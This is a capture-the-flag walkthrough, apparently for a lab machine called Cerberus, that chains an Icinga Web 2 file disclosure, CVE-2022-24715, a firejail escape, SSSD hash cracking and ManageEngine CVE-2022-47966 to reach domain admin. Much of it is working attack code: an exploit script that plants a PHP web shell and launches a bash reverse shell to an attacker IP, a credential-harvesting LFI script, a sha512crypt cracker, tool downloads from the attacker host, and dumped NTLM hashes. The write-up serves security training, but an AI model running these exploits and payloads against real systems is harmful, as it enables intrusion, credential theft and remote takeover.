Basic information

Port scan

Only one port, 8080:

$ nmap -sC -sV -Pn 10.10.11.205
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 09:49 CST
Nmap scan report for 10.10.11.205
Host is up (0.091s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.52 seconds


A hosts entry is needed; the application is Icinga Web 2:

10.10.11.205  icinga.cerberus.local


Searching for this version turns up known vulnerabilities:

LFI

First, the LFI is used to read files:

Following the documentation, reading a few configuration files yields a set of credentials:

matthew
IcingaWebPassword2023
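As an added example (not code from the original post), the script below automates the "read the config files through the LFI" step. It assumes the unauthenticated disclosure path from the companion bug in the same Sonar advisory (CVE-2022-24716, the `/lib/icinga/icinga-php-thirdparty/` prefix); the list of target files and the embedded `resources.ini` sample are constructed for illustration, with the values from this writeup filled in.

```python
import configparser
import urllib.request
from typing import Callable, Dict, List

# Assumption: the disclosure path of the companion bug from the same Sonar advisory
# (CVE-2022-24716). The static-file controller resolves whatever follows this
# prefix against the filesystem root, so /etc/... can be read without logging in.
LFI_PREFIX = "/icingaweb2/lib/icinga/icinga-php-thirdparty"

# The files Icinga Web 2 keeps credentials in; resources.ini is the one to read first.
TARGET_FILES = [
    "/etc/icingaweb2/resources.ini",
    "/etc/icingaweb2/authentication.ini",
    "/etc/icingaweb2/config.ini",
]

# Constructed sample of what resources.ini looks like on a default install
# (the credential values are the ones recovered in this writeup).
SAMPLE_RESOURCES_INI = """\
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
port = "3306"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
charset = ""
use_ssl = "0"
"""


def lfi_url(base: str, path: str) -> str:
    """Build the disclosure URL for an absolute path on the target."""
    return base.rstrip("/") + LFI_PREFIX + path


def fetch_via_lfi(base: str, path: str) -> str:
    """Read a file through the disclosure bug (plain urllib, no session needed)."""
    with urllib.request.urlopen(lfi_url(base, path), timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_credentials(ini_text: str) -> List[Dict[str, str]]:
    """Return every section of an Icinga Web 2 INI that carries a username/password pair.

    Icinga quotes its values ("matthew"); configparser keeps the quotes, so strip them.
    """
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(ini_text)
    found = []
    for section in cp.sections():
        user = cp.get(section, "username", fallback=None)
        pw = cp.get(section, "password", fallback=None)
        if user is None or pw is None:
            continue
        found.append({
            "resource": section,
            "type": cp.get(section, "type", fallback="").strip('"'),
            "host": cp.get(section, "host", fallback="").strip('"'),
            "username": user.strip('"'),
            "password": pw.strip('"'),
        })
    return found


def harvest(base: str, fetch: Callable[[str, str], str] = fetch_via_lfi) -> List[Dict[str, str]]:
    """Pull each target file and collect credentials; unreadable files are skipped."""
    creds = []
    for path in TARGET_FILES:
        try:
            text = fetch(base, path)
        except Exception as exc:  # 404/403, connection error, or a non-INI response
            print(f"[-] {path}: {exc}")
            continue
        for entry in extract_credentials(text):
            entry["file"] = path
            creds.append(entry)
    return creds


if __name__ == "__main__":
    for c in harvest("http://icinga.cerberus.local:8080"):
        print(f"{c['file']} [{c['resource']}] {c['username']}:{c['password']}")
```

The `fetch` parameter is injectable so the parsing can be exercised offline; against a live target the default `fetch_via_lfi` does the HTTP request. A DB password reused as a web login, as here, is exactly the kind of thing worth checking for in every section the parser returns.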


These credentials log in to the web interface:

CVE-2022-24715

Once logged in, exploit CVE-2022-24715 following the steps in the Sonar blog:

  1. Create an SSH key pair:

     ssh-keygen -t rsa -m PEM

  2. Create a new SSH resource in Icinga Web (Configuration -> Resources -> Create a New Resource):

     Resource Name: ssh-user
     User: ssh-user
     Private Key: <Your generated Key>

  3. Create another resource that writes the PHP payload. The file:// reference to the key from step 2 satisfies the private-key validation (the null byte ends the path as far as the check is concerned), while the whole string is written to the path taken from the User field:

     Resource Name: SHELL
     User: ../../../../../dev/shm/run.php
     Private Key: file:///etc/icingaweb2/ssh/ssh-user%00 <?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'");

  4. Go to Configuration -> Application and change Module Path to include /dev/:

     WHATEVER:/dev/

  5. Go to Configuration -> Modules and enable shm; this triggers execution of run.php and returns a shell.

An automated script was also shared on Discord:

python3 icingaweb2.py -i 10.10.14.2 -p 4444

The resulting shell is www-data inside a container:

exp.py

import requests
import bs4
import argparse


def get_csrf(resp):
    """Pull the CSRFToken hidden field out of an Icinga Web 2 form page."""
    soup = bs4.BeautifulSoup(resp.text, "html.parser")  # stdlib parser, no lxml dependency
    return soup.find("input", {"id": "CSRFToken"})["value"]


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='lol')
    parser.add_argument('-i', '--ip', help='nc listener ip', required=True)
    parser.add_argument('-p', '--port', help='nc listener port', required=True)
    args = parser.parse_args()

    session = requests.session()

    # LOGIN with the credentials recovered through the LFI
    URL = "http://icinga.cerberus.local:8080/icingaweb2/authentication/login"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"username":"matthew","password":"IcingaWebPassword2023","rememberme":"0","redirect":"","formUID":"form_login","CSRFToken":csrf_token,"btn_submit":"Login"}
    resp = session.post(URL, data=data)

    # CHANGE MODULE PATH: point global_module_path at /dev/ so /dev/shm looks like a module.
    # The form posts a hidden "0" and a checked "1" for each checkbox; a list of pairs keeps
    # both fields the way a browser sends them (a dict would silently drop the duplicate key).
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/general"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = [("global_show_stacktraces","0"),("global_show_stacktraces","1"),("global_show_application_state_messages","0"),("global_show_application_state_messages","1"),("global_module_path","/dev/"),("global_config_resource","icingaweb2"),("logging_log","syslog"),("logging_level","ERROR"),("logging_application","icingaweb2"),("logging_facility","user"),("themes_default","Icinga"),("themes_disabled","0"),("authentication_default_domain",""),("formUID","form_config_general"),("CSRFToken",csrf_token),("btn_submit","Save Changes")]
    resp = session.post(URL, data=data)

    # ENABLE MODULE "shm" (i.e. /dev/shm); its run.php will be routed as /icingaweb2/shm/run
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/moduleenable"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"identifier":"shm","CSRFToken":csrf_token,"btn_submit":"btn_submit"}
    resp = session.post(URL, data=data)

    # UPLOAD SSH KEY: a valid key is stored as /etc/icingaweb2/ssh/test and is referenced below
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"type":"ssh","name":"test","user":"test","private_key":"-----BEGIN RSA PRIVATE KEY-----\r\n\
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\r\n\
-----END RSA PRIVATE KEY-----","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)

    # EXPLOIT: WRITE PHP FILE. The file:// reference (cut by the NUL byte) passes key
    # validation; the full string is written to the path given in "user".
    URL = "http://icinga.cerberus.local:8080/icingaweb2/config/createresource"
    resp = session.get(URL)
    csrf_token = get_csrf(resp)
    data = {"type":"ssh","name":"asdf2","user":"../../../../../dev/shm/run.php","private_key":"file:///etc/icingaweb2/ssh/test\x00<?php system($_REQUEST['cmd']);?>","formUID":"form_config_resource","CSRFToken":csrf_token,"btn_submit":"Save Changes"}
    resp = session.post(URL, data=data)

    # GET REVERSE SHELL by requesting the planted file through the fake module route
    URL = "http://icinga.cerberus.local:8080/icingaweb2/shm/run"
    data = {"cmd":"bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(args.ip,args.port)}
    session.post(URL, data=data)

Container

Basic enumeration shows that firejail is SUID:

find / -perm -u=s -type f 2>/dev/null

/usr/bin/firejail

Searching turns up a related vulnerability:

Container privilege escalation

A PoC is provided:

Two shells are needed: one runs firejoin.py, the other joins the sandbox it creates:

wget 10.10.14.2:7777/firejoin.py

python3 firejoin.py

firejail --join=1792
# the sudo command suggested by the PoC did not work, but su works directly
su -

Information gathering

Check the relevant configuration files and look at the data files; the SSSD cache contains a cached password hash:

root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb

name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb

cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0

Cracking the hash gives the password:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

147258369
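The cachedPassword value that SSSD stores is an ordinary crypt(3) string; the `$6$` prefix marks it as sha512crypt (john's `sha512crypt` format), which is why rockyou works directly against it. As an added example, not part of the original post, the block below reimplements the sha512crypt algorithm in pure Python and runs a tiny dictionary attack against the hash recovered above; the four-entry wordlist is constructed as a stand-in for rockyou.txt.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# crypt(3) base64 alphabet (not the RFC 4648 one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Byte triples of the final digest, in the order the sha512crypt encoding emits them.
_ORDER = [
    (0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
    (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
    (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
    (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
    (62, 20, 41),
]

# The cachedPassword value pulled from cache_cerberus.local.ldb above.
SSSD_HASH = "$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0"

# Constructed stand-in for rockyou.txt; the real wordlist has millions of lines.
WORDLIST = ["password", "Welcome1", "cerberus2023", "147258369"]


def _b64_from_24bit(b2: int, b1: int, b0: int, n: int) -> str:
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(ITOA64[w & 0x3F])
        w >>= 6
    return "".join(out)


def parse_sha512crypt(h: str) -> Tuple[int, bytes, str]:
    """Split '$6$[rounds=N$]salt$digest' into (rounds, salt, digest)."""
    parts = h.split("$")
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError("not a sha512crypt ($6$) hash")
    rounds, idx = 5000, 2
    if parts[idx].startswith("rounds="):
        rounds, idx = int(parts[idx][len("rounds="):]), idx + 1
    return rounds, parts[idx].encode()[:16], parts[idx + 1]


def sha512crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """Return the encoded digest part of crypt(3) SHA-512 (Drepper's algorithm)."""
    H = lambda data: hashlib.sha512(data).digest()
    plen = len(password)
    digest_b = H(password + salt + password)
    a = password + salt + digest_b * (plen // 64) + digest_b[: plen % 64]
    i = plen
    while i > 0:                      # walk the bits of the password length
        a += digest_b if i & 1 else password
        i >>= 1
    digest_a = H(a)
    dp = H(password * plen)
    p = dp * (plen // 64) + dp[: plen % 64]
    ds = H(salt * (16 + digest_a[0]))
    s = ds * (len(salt) // 64) + ds[: len(salt) % 64]
    c = digest_a
    for r in range(rounds):           # the expensive part: 5000 rounds by default
        buf = p if r & 1 else c
        if r % 3:
            buf += s
        if r % 7:
            buf += p
        buf += c if r & 1 else p
        c = H(buf)
    enc = "".join(_b64_from_24bit(c[x], c[y], c[z], 4) for x, y, z in _ORDER)
    return enc + _b64_from_24bit(0, 0, c[63], 2)


def crack(h: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: hash each candidate with the stored salt/rounds and compare."""
    rounds, salt, digest = parse_sha512crypt(h)
    for cand in candidates:
        if sha512crypt(cand.encode(), salt, rounds) == digest:
            return cand
    return None


if __name__ == "__main__":
    print("cracked:", crack(SSSD_HASH, WORDLIST))
```

The point of seeing the algorithm spelled out is the cost model: every candidate costs 5000 SHA-512 invocations, so a real wordlist is a job for john or hashcat rather than Python, but a short, keyboard-pattern password such as this one falls to the first few thousand rockyou entries regardless of the rounds.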

user flag

From the container's IP, 172.16.22.1 is presumably the host. Scan it from inside and forward the port out with chisel (server on the attacking machine, client in the container):

./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

wget http://10.10.14.2:7777/chisel_1.7.6_linux_amd64
chmod +x chisel_1.7.6_linux_amd64
./chisel_1.7.6_linux_amd64 client 10.10.14.2:9999 R:5985:172.16.22.1:5985

Then connect through the forwarded port; the user flag is on the desktop:

evil-winrm  -u 'matthew' -p '147258369' -i 127.0.0.1

Privilege escalation information

Routine enumeration finds ManageEngine ADSelfService Plus:

CVE-2022-47966

Searching turns up a fairly recent vulnerability for it:

Proxy

Exploiting it requires some information from the application first, so a proxy into the internal network has to be set up:

*Evil-WinRM* PS C:\windows\tasks> upload /Users/miao/Tools/Offsec/chisel.exe C:\windows\tasks

.\chisel.exe client 10.10.14.2:9999 R:1080:socks

The host can then be scanned through the SOCKS proxy:

proxychains4 -q nmap -v -Pn -sV -sC -p- 172.16.22.1

Scanning 172.16.22.1 [65535 ports]
Discovered open port 53/tcp on 172.16.22.1
Discovered open port 139/tcp on 172.16.22.1
Discovered open port 135/tcp on 172.16.22.1
Discovered open port 445/tcp on 172.16.22.1
Discovered open port 8888/tcp on 172.16.22.1
Discovered open port 443/tcp on 172.16.22.1
Discovered open port 80/tcp on 172.16.22.1

Accessing port 8888 redirects automatically to 9251, and another hosts entry is needed:

172.16.22.1 dc.cerberus.local dc

Logging in with our matthew account gives no permissions, but it is already enough to obtain the GUID we need:

67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

Checking the Burp traffic also reveals a request for an XML file from which the required issuer information can be obtained:

https://dc.cerberus.local/FederationMetadata/2007-06/FederationMetadata.xml

https://dc.cerberus.local/adfs/services/trust

exploit & root flag

Metasploit has a matching module, which is the most convenient route:

proxychains4 -q msfconsole

use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
set GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
set ISSUER_URL http://dc.cerberus.local/adfs/services/trust
set RHOSTS 172.16.22.1
set LHOST 10.10.14.2

# gotcha: the proxy still has to be set explicitly, proxychains alone is not enough
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true

exploit


hashdump

A 64-bit shell is needed for this; the module's default payload is 32-bit:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a89ac8a8b099a7578cd9698578d01fd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d2e82d4f77310a49973793ee986b6490:::
matthew:1104:aad3b435b51404eeaad3b435b51404ee:bcd285980e1d9b302e16875844ef6977:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:de7392b6e8a9ce8d34209a3838249903:::
adfs_svc$:5602:aad3b435b51404eeaad3b435b51404ee:d711db215c7eb570d41acc0cac98da96:::
ICINGA$:9102:aad3b435b51404eeaad3b435b51404ee:af70cf6b33f1cce788138d459f676faf:::
